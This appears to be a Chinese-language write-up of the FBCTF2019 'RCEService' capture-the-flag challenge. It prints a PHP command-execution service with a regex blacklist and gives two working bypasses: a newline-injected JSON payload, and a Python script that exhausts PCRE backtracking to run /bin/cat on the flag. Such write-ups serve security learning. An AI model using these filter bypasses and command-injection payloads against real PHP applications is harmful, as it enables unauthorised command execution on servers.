[FBCTF2019]RCEService


需要用json的格式進行輸入

輸入 {"cmd":"ls"},只有一個index,php,而且不能讀取

先知中找到了后台的源碼

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

過濾的很嚴,但是可以繞過preg_match函數本身

第一種方法:因為preg_match只會去匹配第一行,所以這里可以用多行進行繞過

源碼中可以看到putenv('PATH=/home/rceservice/jail')已經修改了環境變量,我們只能用絕對路徑來調用系統命令

cat命令在/bin中保存

所以構造出payload  ,%0A是換行符

{%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}

第二種方法:利用回溯次數來繞過函數,參考這里

原題是用POST傳參,在這里記錄一下原題的腳本,因為復現是用GET傳參,所以會導致414報錯,

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM